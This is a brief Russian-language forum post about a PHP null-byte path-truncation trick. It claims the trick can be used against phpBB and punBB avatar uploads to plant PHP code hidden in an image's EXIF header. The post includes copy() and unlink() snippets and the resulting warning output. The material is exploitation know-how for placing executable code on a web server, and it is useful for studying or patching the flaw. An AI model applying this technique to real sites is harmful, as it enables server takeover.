уязвимость например имеет место быть в таких популярных форумах как phpBB и
punBB, удачная эксплуатация происходит при подмене пути загрузки аватары, и
загрузки аватары с PHP кодом (например в EXIF заголовке).
КОД:
copy('1.jpg', "./dir_for_upload/1.php\0"."/2.jpg");
или
copy('1.jpg', "./dir_for_upload/1.php/\0"."/2.jpg");
КОД:
unlink("./dir_for_upload/1.php/\0"."/2.jpg");
Warning: unlink(./dir_for_upload/1.php/) [function.unlink]: Not a directory
не удаляет файл 1.php
–
BOM SHANKAR